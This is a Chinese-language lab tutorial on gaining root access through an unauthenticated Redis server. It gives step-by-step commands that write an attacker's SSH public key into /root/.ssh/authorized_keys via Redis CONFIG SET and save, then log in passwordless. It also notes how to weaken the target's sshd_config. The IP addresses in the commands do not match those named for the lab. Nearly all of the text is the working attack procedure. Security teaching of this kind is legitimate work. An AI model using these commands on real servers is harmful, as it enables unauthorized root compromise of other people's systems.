關於Redis漏洞的詳解及寫shell、getshell的利用請出示門票:傳送門
利用原理
利用 Redis 自身的提供的 config 命令,可以進行寫文件操作,攻擊者可以成功將自己的公鑰寫入目標服務器的 /root/.ssh
文件夾的authotrized_keys
文件中,進而可以直接使用對應的私鑰登錄目標服務器。
利用
實驗場景
Redis服務器(靶機):Ubuntu 16.4 ----- 192.168.101.46
Redis客戶機(攻擊機):Ubuntu 16.4 ----- 192.168.101.47
一、在攻擊機(redis客戶端)中生成ssh公鑰和私鑰,密碼設置爲空
ssh-keygen –t rsa
二、進入/root/.ssh目錄: cd /root/.ssh , 講生成的公鑰保存到1.txt(名字隨意)
$ (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt
三、鏈接目標服務器上的Redis服務,將保存的公鑰1.txt寫入Redis(使用redis-cli -h ip命令連接靶機,將文件寫入)
$ cat 1.txt | redis-cli -h 10.10.10.135 -x set crack
四、通過客戶端遠程登陸目標靶機的Redis服務
使用 CONFIG GET dir 命令得到Redis備份的路徑
redis-cli -h 10.10.10.135
CONFIG GET dir
更改Redis備份路徑爲ssh公鑰存放目錄(一般默認爲/root/.ssh)
config set dir /root/.ssh
設置上傳公鑰的備份文件名字爲authorized_keys
CONFIG SET dbfilename authorized_keys
檢查是否更改成功(查看有沒有authorized_keys文件),沒有問題就保存然後退出
CONFIG GET dbfilename
save
exit
靶機服務器上可以看到文件已被寫入
五、在攻擊機上使用SSH免密登錄靶機
ssh -i id_rsa [ip]
踩坑記錄
- 靶機服務端關於ssh的配置
vim /etc/ssh/sshd_config
PermitRootLogin yes #允許root登錄
PermitEmptyPasswords yes #允許空密碼登錄
PasswordAuthentication yes #設置是否使用口令驗證。
PasswordAuthentication no //yes改爲no
RSAAuthentication yes #去掉前面的註釋
PubkeyAuthentication yes #去掉前面的註釋
AuthorizedKeysFile .ssh/authorized_keys #去掉前面的註釋
-
cd /root/.ssh/
bash: cd: /root/.ssh/: No such file or directory
由於本機沒有用root登陸過
解決辦法:
用root用戶登錄,執行下ssh操作,就能自動生成
ssh localhost ----> yes ----> 輸入password
-
authorized_keys
該文件名不要打錯 -
redis服務端要以root權限運行
GOT IT!
******************************************************
小實驗小結,具體測試利用方式需根據具體實踐場景~